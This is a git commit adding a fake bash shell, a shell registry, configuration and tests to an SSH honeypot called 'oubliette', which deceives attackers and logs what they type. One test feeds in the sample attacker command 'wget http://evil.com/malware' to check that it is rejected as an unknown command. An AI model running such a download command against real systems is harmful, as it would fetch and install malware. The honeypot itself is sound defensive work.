feat: add shell interface, registry, and bash shell emulator

Implement Phase 1.4: replaces the hardcoded banner/timeout stub with a
proper shell system. Adds a Shell interface with weighted registry for
shell selection, a RecordingChannel wrapper (pass-through for now, prep
for Phase 2.3 replay), and a bash-like shell with fake filesystem,
terminal line reader, and command handling (pwd, ls, cd, cat, whoami,
hostname, id, uname, exit). Sessions now log command/output pairs to
the store and record the shell name.

Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
This commit is contained in:
2026-02-14 20:24:48 +01:00
parent ae9924ffbb
commit 8189a108d1
17 changed files with 1503 additions and 41 deletions

View File

@@ -37,6 +37,9 @@ Key settings:
- `storage.db_path` — SQLite database path (default `oubliette.db`) - `storage.db_path` — SQLite database path (default `oubliette.db`)
- `storage.retention_days` — auto-prune records older than N days (default `90`) - `storage.retention_days` — auto-prune records older than N days (default `90`)
- `storage.retention_interval` — how often to run retention (default `1h`) - `storage.retention_interval` — how often to run retention (default `1h`)
- `shell.hostname` — hostname shown in shell prompts (default `ubuntu-server`)
- `shell.banner` — banner displayed on connection
- `shell.fake_user` — override username in prompt; empty uses the authenticated user
### Run ### Run

View File

@@ -9,11 +9,19 @@ import (
) )
type Config struct { type Config struct {
SSH SSHConfig `toml:"ssh"` SSH SSHConfig `toml:"ssh"`
Auth AuthConfig `toml:"auth"` Auth AuthConfig `toml:"auth"`
Storage StorageConfig `toml:"storage"` Storage StorageConfig `toml:"storage"`
LogLevel string `toml:"log_level"` Shell ShellConfig `toml:"shell"`
LogFormat string `toml:"log_format"` // "text" (default) or "json" LogLevel string `toml:"log_level"`
LogFormat string `toml:"log_format"` // "text" (default) or "json"
}
type ShellConfig struct {
Hostname string `toml:"hostname"`
Banner string `toml:"banner"`
FakeUser string `toml:"fake_user"`
Shells map[string]map[string]any `toml:"-"` // per-shell config extracted manually
} }
type StorageConfig struct { type StorageConfig struct {
@@ -56,6 +64,14 @@ func Load(path string) (*Config, error) {
return nil, fmt.Errorf("parsing config: %w", err) return nil, fmt.Errorf("parsing config: %w", err)
} }
// Second pass: extract per-shell sub-tables (e.g. [shell.bash]).
var raw map[string]any
if err := toml.Unmarshal(data, &raw); err == nil {
if shellSection, ok := raw["shell"].(map[string]any); ok {
cfg.Shell.Shells = extractShellTables(shellSection)
}
}
applyDefaults(cfg) applyDefaults(cfg)
if err := validate(cfg); err != nil { if err := validate(cfg); err != nil {
@@ -96,6 +112,36 @@ func applyDefaults(cfg *Config) {
if cfg.Storage.RetentionInterval == "" { if cfg.Storage.RetentionInterval == "" {
cfg.Storage.RetentionInterval = "1h" cfg.Storage.RetentionInterval = "1h"
} }
if cfg.Shell.Hostname == "" {
cfg.Shell.Hostname = "ubuntu-server"
}
if cfg.Shell.Banner == "" {
cfg.Shell.Banner = "Welcome to Ubuntu 22.04.3 LTS (GNU/Linux 5.15.0-89-generic x86_64)\r\n\r\n"
}
}
// knownShellKeys are top-level keys in [shell] that are not per-shell sub-tables.
var knownShellKeys = map[string]bool{
"hostname": true,
"banner": true,
"fake_user": true,
}
// extractShellTables pulls per-shell config sub-tables from the raw [shell] section.
func extractShellTables(section map[string]any) map[string]map[string]any {
result := make(map[string]map[string]any)
for key, val := range section {
if knownShellKeys[key] {
continue
}
if sub, ok := val.(map[string]any); ok {
result[key] = sub
}
}
if len(result) == 0 {
return nil
}
return result
} }
func validate(cfg *Config) error { func validate(cfg *Config) error {

View File

@@ -169,6 +169,59 @@ retention_interval = "2h"
} }
} }
func TestLoadShellDefaults(t *testing.T) {
path := writeTemp(t, "")
cfg, err := Load(path)
if err != nil {
t.Fatalf("unexpected error: %v", err)
}
if cfg.Shell.Hostname != "ubuntu-server" {
t.Errorf("default hostname = %q, want %q", cfg.Shell.Hostname, "ubuntu-server")
}
if cfg.Shell.Banner == "" {
t.Error("default banner should not be empty")
}
if cfg.Shell.FakeUser != "" {
t.Errorf("default fake_user = %q, want empty", cfg.Shell.FakeUser)
}
}
func TestLoadShellConfig(t *testing.T) {
content := `
[shell]
hostname = "myhost"
banner = "Custom banner\r\n"
fake_user = "admin"
[shell.bash]
custom_key = "value"
`
path := writeTemp(t, content)
cfg, err := Load(path)
if err != nil {
t.Fatalf("unexpected error: %v", err)
}
if cfg.Shell.Hostname != "myhost" {
t.Errorf("hostname = %q, want %q", cfg.Shell.Hostname, "myhost")
}
if cfg.Shell.Banner != "Custom banner\r\n" {
t.Errorf("banner = %q, want %q", cfg.Shell.Banner, "Custom banner\r\n")
}
if cfg.Shell.FakeUser != "admin" {
t.Errorf("fake_user = %q, want %q", cfg.Shell.FakeUser, "admin")
}
if cfg.Shell.Shells == nil {
t.Fatal("Shells map should not be nil")
}
bashCfg, ok := cfg.Shell.Shells["bash"]
if !ok {
t.Fatal("Shells[\"bash\"] not found")
}
if bashCfg["custom_key"] != "value" {
t.Errorf("Shells[\"bash\"][\"custom_key\"] = %v, want %q", bashCfg["custom_key"], "value")
}
}
func TestLoadMissingFile(t *testing.T) { func TestLoadMissingFile(t *testing.T) {
_, err := Load("/nonexistent/path/config.toml") _, err := Load("/nonexistent/path/config.toml")
if err == nil { if err == nil {

View File

@@ -14,28 +14,35 @@ import (
"git.t-juice.club/torjus/oubliette/internal/auth" "git.t-juice.club/torjus/oubliette/internal/auth"
"git.t-juice.club/torjus/oubliette/internal/config" "git.t-juice.club/torjus/oubliette/internal/config"
"git.t-juice.club/torjus/oubliette/internal/shell"
"git.t-juice.club/torjus/oubliette/internal/shell/bash"
"git.t-juice.club/torjus/oubliette/internal/storage" "git.t-juice.club/torjus/oubliette/internal/storage"
"golang.org/x/crypto/ssh" "golang.org/x/crypto/ssh"
) )
const sessionTimeout = 30 * time.Second
type Server struct { type Server struct {
cfg config.Config cfg config.Config
store storage.Store store storage.Store
authenticator *auth.Authenticator authenticator *auth.Authenticator
sshConfig *ssh.ServerConfig sshConfig *ssh.ServerConfig
logger *slog.Logger logger *slog.Logger
connSem chan struct{} // semaphore limiting concurrent connections connSem chan struct{} // semaphore limiting concurrent connections
shellRegistry *shell.Registry
} }
func New(cfg config.Config, store storage.Store, logger *slog.Logger) (*Server, error) { func New(cfg config.Config, store storage.Store, logger *slog.Logger) (*Server, error) {
registry := shell.NewRegistry()
if err := registry.Register(bash.NewBashShell(), 1); err != nil {
return nil, fmt.Errorf("registering bash shell: %w", err)
}
s := &Server{ s := &Server{
cfg: cfg, cfg: cfg,
store: store, store: store,
authenticator: auth.NewAuthenticator(cfg.Auth), authenticator: auth.NewAuthenticator(cfg.Auth),
logger: logger, logger: logger,
connSem: make(chan struct{}, cfg.SSH.MaxConnections), connSem: make(chan struct{}, cfg.SSH.MaxConnections),
shellRegistry: registry,
} }
hostKey, err := loadOrGenerateHostKey(cfg.SSH.HostKeyPath) hostKey, err := loadOrGenerateHostKey(cfg.SSH.HostKeyPath)
@@ -126,8 +133,15 @@ func (s *Server) handleConn(conn net.Conn) {
func (s *Server) handleSession(channel ssh.Channel, requests <-chan *ssh.Request, conn *ssh.ServerConn) { func (s *Server) handleSession(channel ssh.Channel, requests <-chan *ssh.Request, conn *ssh.ServerConn) {
defer channel.Close() defer channel.Close()
// Select a shell from the registry.
selectedShell, err := s.shellRegistry.Select()
if err != nil {
s.logger.Error("failed to select shell", "err", err)
return
}
ip := extractIP(conn.RemoteAddr()) ip := extractIP(conn.RemoteAddr())
sessionID, err := s.store.CreateSession(context.Background(), ip, conn.User(), "") sessionID, err := s.store.CreateSession(context.Background(), ip, conn.User(), selectedShell.Name())
if err != nil { if err != nil {
s.logger.Error("failed to create session", "err", err) s.logger.Error("failed to create session", "err", err)
} else { } else {
@@ -138,6 +152,13 @@ func (s *Server) handleSession(channel ssh.Channel, requests <-chan *ssh.Request
}() }()
} }
s.logger.Info("session started",
"remote_addr", conn.RemoteAddr(),
"user", conn.User(),
"shell", selectedShell.Name(),
"session_id", sessionID,
)
// Handle session requests (pty-req, shell, etc.) // Handle session requests (pty-req, shell, etc.)
go func() { go func() {
for req := range requests { for req := range requests {
@@ -154,33 +175,37 @@ func (s *Server) handleSession(channel ssh.Channel, requests <-chan *ssh.Request
} }
}() }()
// Write a fake banner. // Build session context.
fmt.Fprint(channel, "Welcome to Ubuntu 22.04.3 LTS (GNU/Linux 5.15.0-89-generic x86_64)\r\n\r\n") var shellCfg map[string]any
fmt.Fprintf(channel, "Last login: %s from 10.0.0.1\r\n", time.Now().Add(-2*time.Hour).Format("Mon Jan 2 15:04:05 2006")) if s.cfg.Shell.Shells != nil {
fmt.Fprintf(channel, "%s@ubuntu:~$ ", conn.User()) shellCfg = s.cfg.Shell.Shells[selectedShell.Name()]
// Hold connection open until timeout or client disconnect.
timer := time.NewTimer(sessionTimeout)
defer timer.Stop()
done := make(chan struct{})
go func() {
buf := make([]byte, 256)
for {
_, err := channel.Read(buf)
if err != nil {
close(done)
return
}
}
}()
select {
case <-timer.C:
s.logger.Info("session timed out", "remote_addr", conn.RemoteAddr(), "user", conn.User())
case <-done:
s.logger.Info("session closed by client", "remote_addr", conn.RemoteAddr(), "user", conn.User())
} }
sessCtx := &shell.SessionContext{
SessionID: sessionID,
Username: conn.User(),
RemoteAddr: ip,
ClientVersion: string(conn.ClientVersion()),
Store: s.store,
ShellConfig: shellCfg,
CommonConfig: shell.ShellCommonConfig{
Hostname: s.cfg.Shell.Hostname,
Banner: s.cfg.Shell.Banner,
FakeUser: s.cfg.Shell.FakeUser,
},
}
// Wrap channel in RecordingChannel for future byte-level recording.
recorder := shell.NewRecordingChannel(channel)
if err := selectedShell.Handle(context.Background(), sessCtx, recorder); err != nil {
s.logger.Error("shell error", "err", err, "session_id", sessionID)
}
s.logger.Info("session ended",
"remote_addr", conn.RemoteAddr(),
"user", conn.User(),
"session_id", sessionID,
)
} }
func (s *Server) passwordCallback(conn ssh.ConnMetadata, password []byte) (*ssh.Permissions, error) { func (s *Server) passwordCallback(conn ssh.ConnMetadata, password []byte) (*ssh.Permissions, error) {

View File

@@ -1,11 +1,13 @@
package server package server
import ( import (
"bytes"
"context" "context"
"log/slog" "log/slog"
"net" "net"
"os" "os"
"path/filepath" "path/filepath"
"strings"
"testing" "testing"
"time" "time"
@@ -109,6 +111,10 @@ func TestIntegrationSSHConnect(t *testing.T) {
{Username: "root", Password: "toor"}, {Username: "root", Password: "toor"},
}, },
}, },
Shell: config.ShellConfig{
Hostname: "ubuntu-server",
Banner: "Welcome to Ubuntu 22.04.3 LTS\r\n\r\n",
},
LogLevel: "debug", LogLevel: "debug",
} }
@@ -152,7 +158,7 @@ func TestIntegrationSSHConnect(t *testing.T) {
time.Sleep(50 * time.Millisecond) time.Sleep(50 * time.Millisecond)
} }
// Test static credential login. // Test static credential login with shell interaction.
t.Run("static_cred", func(t *testing.T) { t.Run("static_cred", func(t *testing.T) {
clientCfg := &ssh.ClientConfig{ clientCfg := &ssh.ClientConfig{
User: "root", User: "root",
@@ -172,6 +178,62 @@ func TestIntegrationSSHConnect(t *testing.T) {
t.Fatalf("new session: %v", err) t.Fatalf("new session: %v", err)
} }
defer session.Close() defer session.Close()
// Request PTY and shell.
if err := session.RequestPty("xterm", 80, 40, ssh.TerminalModes{}); err != nil {
t.Fatalf("request pty: %v", err)
}
stdin, err := session.StdinPipe()
if err != nil {
t.Fatalf("stdin pipe: %v", err)
}
var output bytes.Buffer
session.Stdout = &output
if err := session.Shell(); err != nil {
t.Fatalf("shell: %v", err)
}
// Wait for the prompt, then send commands.
time.Sleep(500 * time.Millisecond)
stdin.Write([]byte("pwd\r"))
time.Sleep(200 * time.Millisecond)
stdin.Write([]byte("whoami\r"))
time.Sleep(200 * time.Millisecond)
stdin.Write([]byte("exit\r"))
// Wait for session to end.
session.Wait()
out := output.String()
if !strings.Contains(out, "Welcome to Ubuntu") {
t.Errorf("output should contain banner, got: %s", out)
}
if !strings.Contains(out, "/root") {
t.Errorf("output should contain /root from pwd, got: %s", out)
}
if !strings.Contains(out, "root") {
t.Errorf("output should contain 'root' from whoami, got: %s", out)
}
// Verify session logs were recorded.
if len(store.SessionLogs) < 2 {
t.Errorf("expected at least 2 session logs, got %d", len(store.SessionLogs))
}
// Verify session was created with shell name.
var foundBash bool
for _, s := range store.Sessions {
if s.ShellName == "bash" {
foundBash = true
break
}
}
if !foundBash {
t.Error("expected a session with shell_name='bash'")
}
}) })
// Test wrong password is rejected. // Test wrong password is rejected.

158
internal/shell/bash/bash.go Normal file
View File

@@ -0,0 +1,158 @@
package bash
import (
"context"
"fmt"
"io"
"strings"
"time"
"git.t-juice.club/torjus/oubliette/internal/shell"
)
const sessionTimeout = 5 * time.Minute
// BashShell emulates a basic bash-like shell.
type BashShell struct{}
// NewBashShell returns a new BashShell instance.
func NewBashShell() *BashShell {
return &BashShell{}
}
func (b *BashShell) Name() string { return "bash" }
func (b *BashShell) Description() string { return "Basic bash-like shell emulator" }
func (b *BashShell) Handle(ctx context.Context, sess *shell.SessionContext, rw io.ReadWriteCloser) error {
ctx, cancel := context.WithTimeout(ctx, sessionTimeout)
defer cancel()
username := sess.Username
if sess.CommonConfig.FakeUser != "" {
username = sess.CommonConfig.FakeUser
}
hostname := sess.CommonConfig.Hostname
fs := newFilesystem(hostname)
state := &shellState{
cwd: "/root",
username: username,
hostname: hostname,
fs: fs,
}
// Send banner.
if sess.CommonConfig.Banner != "" {
fmt.Fprint(rw, sess.CommonConfig.Banner)
}
fmt.Fprintf(rw, "Last login: %s from 10.0.0.1\r\n",
time.Now().Add(-2*time.Hour).Format("Mon Jan 2 15:04:05 2006"))
for {
prompt := formatPrompt(state)
if _, err := fmt.Fprint(rw, prompt); err != nil {
return nil
}
line, err := readLine(ctx, rw)
if err == io.EOF {
fmt.Fprint(rw, "logout\r\n")
return nil
}
if err != nil {
return nil
}
trimmed := strings.TrimSpace(line)
if trimmed == "" {
continue
}
result := dispatch(state, trimmed)
var output string
if result.output != "" {
output = result.output
// Convert newlines to \r\n for terminal display.
output = strings.ReplaceAll(output, "\r\n", "\n")
output = strings.ReplaceAll(output, "\n", "\r\n")
fmt.Fprintf(rw, "%s\r\n", output)
}
// Log command and output to store.
if sess.Store != nil {
sess.Store.AppendSessionLog(ctx, sess.SessionID, trimmed, output)
}
if result.exit {
return nil
}
}
}
func formatPrompt(state *shellState) string {
cwd := state.cwd
if cwd == "/root" {
cwd = "~"
} else if strings.HasPrefix(cwd, "/root/") {
cwd = "~" + cwd[5:]
}
return fmt.Sprintf("%s@%s:%s# ", state.username, state.hostname, cwd)
}
// readLine reads a line of input byte-by-byte, handling backspace, Ctrl+C, and Ctrl+D.
func readLine(ctx context.Context, rw io.ReadWriter) (string, error) {
var buf []byte
b := make([]byte, 1)
for {
select {
case <-ctx.Done():
return "", ctx.Err()
default:
}
n, err := rw.Read(b)
if err != nil {
return "", err
}
if n == 0 {
continue
}
ch := b[0]
switch {
case ch == '\r' || ch == '\n':
fmt.Fprint(rw, "\r\n")
return string(buf), nil
case ch == 4: // Ctrl+D
if len(buf) == 0 {
return "", io.EOF
}
case ch == 3: // Ctrl+C
fmt.Fprint(rw, "^C\r\n")
return "", nil
case ch == 127 || ch == 8: // DEL or Backspace
if len(buf) > 0 {
buf = buf[:len(buf)-1]
fmt.Fprint(rw, "\b \b")
}
case ch == 27: // ESC - start of escape sequence
// Read and discard the rest of the escape sequence.
// Most are 3 bytes: ESC [ X (arrow keys, etc.)
next := make([]byte, 1)
rw.Read(next)
if next[0] == '[' {
rw.Read(next) // read the final byte
}
case ch >= 32 && ch < 127: // printable ASCII
buf = append(buf, ch)
rw.Write([]byte{ch})
}
}
}

View File

@@ -0,0 +1,198 @@
package bash
import (
"bytes"
"context"
"io"
"strings"
"testing"
"time"
"git.t-juice.club/torjus/oubliette/internal/shell"
"git.t-juice.club/torjus/oubliette/internal/storage"
)
type rwCloser struct {
io.Reader
io.Writer
closed bool
}
func (r *rwCloser) Close() error {
r.closed = true
return nil
}
func TestFormatPrompt(t *testing.T) {
tests := []struct {
cwd string
want string
}{
{"/root", "root@host:~# "},
{"/root/sub", "root@host:~/sub# "},
{"/tmp", "root@host:/tmp# "},
{"/", "root@host:/# "},
}
for _, tt := range tests {
state := &shellState{cwd: tt.cwd, username: "root", hostname: "host"}
got := formatPrompt(state)
if got != tt.want {
t.Errorf("formatPrompt(cwd=%q) = %q, want %q", tt.cwd, got, tt.want)
}
}
}
func TestReadLineEnter(t *testing.T) {
input := bytes.NewBufferString("hello\r")
var output bytes.Buffer
rw := struct {
io.Reader
io.Writer
}{input, &output}
ctx := context.Background()
line, err := readLine(ctx, rw)
if err != nil {
t.Fatalf("readLine: %v", err)
}
if line != "hello" {
t.Errorf("line = %q, want %q", line, "hello")
}
}
func TestReadLineBackspace(t *testing.T) {
// Type "helo", backspace, then "lo\r"
input := bytes.NewBuffer([]byte{'h', 'e', 'l', 'o', 127, 'l', 'o', '\r'})
var output bytes.Buffer
rw := struct {
io.Reader
io.Writer
}{input, &output}
ctx := context.Background()
line, err := readLine(ctx, rw)
if err != nil {
t.Fatalf("readLine: %v", err)
}
if line != "hello" {
t.Errorf("line = %q, want %q", line, "hello")
}
}
func TestReadLineCtrlC(t *testing.T) {
input := bytes.NewBuffer([]byte("partial\x03"))
var output bytes.Buffer
rw := struct {
io.Reader
io.Writer
}{input, &output}
ctx := context.Background()
line, err := readLine(ctx, rw)
if err != nil {
t.Fatalf("readLine: %v", err)
}
if line != "" {
t.Errorf("line after Ctrl+C = %q, want empty", line)
}
}
func TestReadLineCtrlD(t *testing.T) {
input := bytes.NewBuffer([]byte{4}) // Ctrl+D on empty line
var output bytes.Buffer
rw := struct {
io.Reader
io.Writer
}{input, &output}
ctx := context.Background()
_, err := readLine(ctx, rw)
if err != io.EOF {
t.Fatalf("expected io.EOF, got %v", err)
}
}
func TestBashShellHandle(t *testing.T) {
store := storage.NewMemoryStore()
sessID, _ := store.CreateSession(context.Background(), "127.0.0.1", "root", "bash")
sess := &shell.SessionContext{
SessionID: sessID,
Username: "root",
Store: store,
CommonConfig: shell.ShellCommonConfig{
Hostname: "testhost",
Banner: "Welcome to Ubuntu 22.04.3 LTS\r\n\r\n",
},
}
// Simulate typing commands followed by "exit\r"
commands := "pwd\rwhoami\rexit\r"
clientInput := bytes.NewBufferString(commands)
var clientOutput bytes.Buffer
rw := &rwCloser{
Reader: clientInput,
Writer: &clientOutput,
}
sh := NewBashShell()
ctx, cancel := context.WithTimeout(context.Background(), 5*time.Second)
defer cancel()
err := sh.Handle(ctx, sess, rw)
if err != nil {
t.Fatalf("Handle: %v", err)
}
output := clientOutput.String()
// Should contain banner.
if !strings.Contains(output, "Welcome to Ubuntu") {
t.Error("output should contain banner")
}
// Should contain prompt with hostname.
if !strings.Contains(output, "root@testhost") {
t.Errorf("output should contain prompt, got: %s", output)
}
// Check session logs were recorded.
if len(store.SessionLogs) < 2 {
t.Errorf("expected at least 2 session logs, got %d", len(store.SessionLogs))
}
}
func TestBashShellFakeUser(t *testing.T) {
store := storage.NewMemoryStore()
sessID, _ := store.CreateSession(context.Background(), "127.0.0.1", "attacker", "bash")
sess := &shell.SessionContext{
SessionID: sessID,
Username: "attacker",
Store: store,
CommonConfig: shell.ShellCommonConfig{
Hostname: "testhost",
FakeUser: "admin",
},
}
commands := "whoami\rexit\r"
clientInput := bytes.NewBufferString(commands)
var clientOutput bytes.Buffer
rw := &rwCloser{
Reader: clientInput,
Writer: &clientOutput,
}
sh := NewBashShell()
ctx, cancel := context.WithTimeout(context.Background(), 5*time.Second)
defer cancel()
sh.Handle(ctx, sess, rw)
output := clientOutput.String()
if !strings.Contains(output, "admin") {
t.Errorf("output should contain fake user 'admin', got: %s", output)
}
}

View File

@@ -0,0 +1,119 @@
package bash
import (
"fmt"
"runtime"
"sort"
"strings"
)
type shellState struct {
cwd string
username string
hostname string
fs *filesystem
}
type commandResult struct {
output string
exit bool
}
func dispatch(state *shellState, line string) commandResult {
fields := strings.Fields(line)
if len(fields) == 0 {
return commandResult{}
}
cmd := fields[0]
args := fields[1:]
switch cmd {
case "pwd":
return commandResult{output: state.cwd}
case "whoami":
return commandResult{output: state.username}
case "hostname":
return commandResult{output: state.hostname}
case "id":
return cmdID(state)
case "uname":
return cmdUname(state, args)
case "ls":
return cmdLs(state, args)
case "cd":
return cmdCd(state, args)
case "cat":
return cmdCat(state, args)
case "exit", "logout":
return commandResult{exit: true}
default:
return commandResult{output: fmt.Sprintf("%s: command not found", cmd)}
}
}
func cmdID(state *shellState) commandResult {
return commandResult{
output: fmt.Sprintf("uid=0(%s) gid=0(%s) groups=0(%s)", state.username, state.username, state.username),
}
}
func cmdUname(state *shellState, args []string) commandResult {
if len(args) > 0 && args[0] == "-a" {
return commandResult{
output: fmt.Sprintf("Linux %s 5.15.0-89-generic #99-Ubuntu SMP Mon Oct 30 20:42:41 UTC 2023 %s GNU/Linux", state.hostname, runtime.GOARCH),
}
}
return commandResult{output: "Linux"}
}
func cmdLs(state *shellState, args []string) commandResult {
target := state.cwd
if len(args) > 0 {
target = resolvePath(state.cwd, args[0])
}
names, err := state.fs.list(target)
if err != nil {
return commandResult{output: err.Error()}
}
sort.Strings(names)
return commandResult{output: strings.Join(names, " ")}
}
func cmdCd(state *shellState, args []string) commandResult {
target := "/root"
if len(args) > 0 {
target = resolvePath(state.cwd, args[0])
}
if !state.fs.exists(target) {
return commandResult{output: fmt.Sprintf("bash: cd: %s: No such file or directory", args[0])}
}
if !state.fs.isDirectory(target) {
return commandResult{output: fmt.Sprintf("bash: cd: %s: Not a directory", args[0])}
}
state.cwd = target
return commandResult{}
}
func cmdCat(state *shellState, args []string) commandResult {
if len(args) == 0 {
return commandResult{}
}
var parts []string
for _, arg := range args {
p := resolvePath(state.cwd, arg)
content, err := state.fs.read(p)
if err != nil {
parts = append(parts, err.Error())
} else {
parts = append(parts, strings.TrimRight(content, "\n"))
}
}
return commandResult{output: strings.Join(parts, "\n")}
}

View File

@@ -0,0 +1,201 @@
package bash
import (
"strings"
"testing"
)
func newTestState() *shellState {
fs := newFilesystem("testhost")
return &shellState{
cwd: "/root",
username: "root",
hostname: "testhost",
fs: fs,
}
}
func TestCmdPwd(t *testing.T) {
state := newTestState()
r := dispatch(state, "pwd")
if r.output != "/root" {
t.Errorf("pwd = %q, want %q", r.output, "/root")
}
}
func TestCmdWhoami(t *testing.T) {
state := newTestState()
r := dispatch(state, "whoami")
if r.output != "root" {
t.Errorf("whoami = %q, want %q", r.output, "root")
}
}
func TestCmdHostname(t *testing.T) {
state := newTestState()
r := dispatch(state, "hostname")
if r.output != "testhost" {
t.Errorf("hostname = %q, want %q", r.output, "testhost")
}
}
func TestCmdId(t *testing.T) {
state := newTestState()
r := dispatch(state, "id")
if !strings.Contains(r.output, "uid=0(root)") {
t.Errorf("id output = %q, want uid=0(root)", r.output)
}
}
func TestCmdUnameBasic(t *testing.T) {
state := newTestState()
r := dispatch(state, "uname")
if r.output != "Linux" {
t.Errorf("uname = %q, want %q", r.output, "Linux")
}
}
func TestCmdUnameAll(t *testing.T) {
state := newTestState()
r := dispatch(state, "uname -a")
if !strings.HasPrefix(r.output, "Linux testhost") {
t.Errorf("uname -a = %q, want prefix 'Linux testhost'", r.output)
}
}
func TestCmdLs(t *testing.T) {
state := newTestState()
r := dispatch(state, "ls")
if r.output == "" {
t.Error("ls should return non-empty output")
}
}
func TestCmdLsPath(t *testing.T) {
state := newTestState()
r := dispatch(state, "ls /etc")
if !strings.Contains(r.output, "passwd") {
t.Errorf("ls /etc = %q, should contain 'passwd'", r.output)
}
}
func TestCmdLsNonexistent(t *testing.T) {
state := newTestState()
r := dispatch(state, "ls /nope")
if !strings.Contains(r.output, "No such file") {
t.Errorf("ls /nope = %q, should contain 'No such file'", r.output)
}
}
func TestCmdCd(t *testing.T) {
state := newTestState()
r := dispatch(state, "cd /tmp")
if r.output != "" {
t.Errorf("cd /tmp should produce no output, got %q", r.output)
}
if state.cwd != "/tmp" {
t.Errorf("cwd = %q, want %q", state.cwd, "/tmp")
}
}
func TestCmdCdNonexistent(t *testing.T) {
state := newTestState()
r := dispatch(state, "cd /nope")
if !strings.Contains(r.output, "No such file") {
t.Errorf("cd /nope = %q, should contain 'No such file'", r.output)
}
}
func TestCmdCdNoArgs(t *testing.T) {
state := newTestState()
state.cwd = "/tmp"
dispatch(state, "cd")
if state.cwd != "/root" {
t.Errorf("cd with no args should go to /root, got %q", state.cwd)
}
}
func TestCmdCdRelative(t *testing.T) {
state := newTestState()
state.cwd = "/var"
dispatch(state, "cd log")
if state.cwd != "/var/log" {
t.Errorf("cwd = %q, want %q", state.cwd, "/var/log")
}
}
func TestCmdCdDotDot(t *testing.T) {
state := newTestState()
state.cwd = "/var/log"
dispatch(state, "cd ..")
if state.cwd != "/var" {
t.Errorf("cwd = %q, want %q", state.cwd, "/var")
}
}
func TestCmdCat(t *testing.T) {
state := newTestState()
r := dispatch(state, "cat /etc/hostname")
if !strings.Contains(r.output, "testhost") {
t.Errorf("cat /etc/hostname = %q, should contain 'testhost'", r.output)
}
}
func TestCmdCatNonexistent(t *testing.T) {
state := newTestState()
r := dispatch(state, "cat /nope")
if !strings.Contains(r.output, "No such file") {
t.Errorf("cat /nope = %q, should contain 'No such file'", r.output)
}
}
func TestCmdCatDirectory(t *testing.T) {
state := newTestState()
r := dispatch(state, "cat /etc")
if !strings.Contains(r.output, "Is a directory") {
t.Errorf("cat /etc = %q, should contain 'Is a directory'", r.output)
}
}
func TestCmdCatMultiple(t *testing.T) {
state := newTestState()
r := dispatch(state, "cat /etc/hostname /root/README.txt")
if !strings.Contains(r.output, "testhost") || !strings.Contains(r.output, "DO NOT MODIFY") {
t.Errorf("cat multiple files = %q, should contain both file contents", r.output)
}
}
func TestCmdExit(t *testing.T) {
state := newTestState()
r := dispatch(state, "exit")
if !r.exit {
t.Error("exit should set exit=true")
}
}
func TestCmdLogout(t *testing.T) {
state := newTestState()
r := dispatch(state, "logout")
if !r.exit {
t.Error("logout should set exit=true")
}
}
func TestCmdNotFound(t *testing.T) {
state := newTestState()
r := dispatch(state, "wget http://evil.com/malware")
if !strings.Contains(r.output, "command not found") {
t.Errorf("unknown cmd = %q, should contain 'command not found'", r.output)
}
if !strings.HasPrefix(r.output, "wget:") {
t.Errorf("unknown cmd = %q, should start with 'wget:'", r.output)
}
}
func TestCmdEmptyLine(t *testing.T) {
state := newTestState()
r := dispatch(state, "")
if r.output != "" || r.exit {
t.Errorf("empty line should produce no output and not exit")
}
}

View File

@@ -0,0 +1,166 @@
package bash
import (
"fmt"
"path"
"strings"
)
type fsNode struct {
name string
isDir bool
content string
children map[string]*fsNode
}
type filesystem struct {
root *fsNode
}
func newFilesystem(hostname string) *filesystem {
fs := &filesystem{
root: &fsNode{name: "/", isDir: true, children: make(map[string]*fsNode)},
}
fs.mkdirAll("/etc")
fs.mkdirAll("/root")
fs.mkdirAll("/home")
fs.mkdirAll("/var/log")
fs.mkdirAll("/tmp")
fs.mkdirAll("/usr/bin")
fs.mkdirAll("/usr/local")
fs.writeFile("/etc/passwd", "root:x:0:0:root:/root:/bin/bash\n"+
"daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin\n"+
"www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin\n"+
"mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/false\n")
fs.writeFile("/etc/hostname", hostname+"\n")
fs.writeFile("/etc/hosts", "127.0.0.1\tlocalhost\n"+
"127.0.1.1\t"+hostname+"\n"+
"::1\t\tlocalhost ip6-localhost ip6-loopback\n")
fs.writeFile("/root/.bash_history",
"apt update\n"+
"apt upgrade -y\n"+
"systemctl restart nginx\n"+
"tail -f /var/log/syslog\n"+
"df -h\n"+
"free -m\n"+
"netstat -tlnp\n"+
"cat /etc/passwd\n")
fs.writeFile("/root/.bashrc",
"# ~/.bashrc: executed by bash(1) for non-login shells.\n"+
"export PS1='\\u@\\h:\\w\\$ '\n"+
"alias ll='ls -alF'\n"+
"alias la='ls -A'\n")
fs.writeFile("/root/README.txt", "Production server - DO NOT MODIFY\n")
fs.writeFile("/var/log/syslog",
"Jan 12 03:14:22 "+hostname+" systemd[1]: Started Daily apt download activities.\n"+
"Jan 12 03:14:23 "+hostname+" systemd[1]: Started Daily Cleanup of Temporary Directories.\n"+
"Jan 12 04:00:01 "+hostname+" CRON[12345]: (root) CMD (/usr/local/bin/backup.sh)\n"+
"Jan 12 04:00:03 "+hostname+" kernel: [UFW BLOCK] IN=eth0 OUT= SRC=203.0.113.42 DST=10.0.0.5 PROTO=TCP DPT=22\n")
fs.writeFile("/tmp/notes.txt", "TODO: Update SSL certificates\n")
return fs
}
// resolvePath converts a potentially relative path to an absolute one.
func resolvePath(cwd, p string) string {
if !strings.HasPrefix(p, "/") {
p = cwd + "/" + p
}
return path.Clean(p)
}
func (fs *filesystem) lookup(p string) *fsNode {
p = path.Clean(p)
if p == "/" {
return fs.root
}
parts := strings.Split(strings.TrimPrefix(p, "/"), "/")
node := fs.root
for _, part := range parts {
if node.children == nil {
return nil
}
child, ok := node.children[part]
if !ok {
return nil
}
node = child
}
return node
}
func (fs *filesystem) exists(p string) bool {
return fs.lookup(p) != nil
}
func (fs *filesystem) isDirectory(p string) bool {
n := fs.lookup(p)
return n != nil && n.isDir
}
func (fs *filesystem) list(p string) ([]string, error) {
n := fs.lookup(p)
if n == nil {
return nil, fmt.Errorf("ls: cannot access '%s': No such file or directory", p)
}
if !n.isDir {
return nil, fmt.Errorf("ls: cannot access '%s': Not a directory", p)
}
names := make([]string, 0, len(n.children))
for name, child := range n.children {
if child.isDir {
name += "/"
}
names = append(names, name)
}
return names, nil
}
func (fs *filesystem) read(p string) (string, error) {
n := fs.lookup(p)
if n == nil {
return "", fmt.Errorf("cat: %s: No such file or directory", p)
}
if n.isDir {
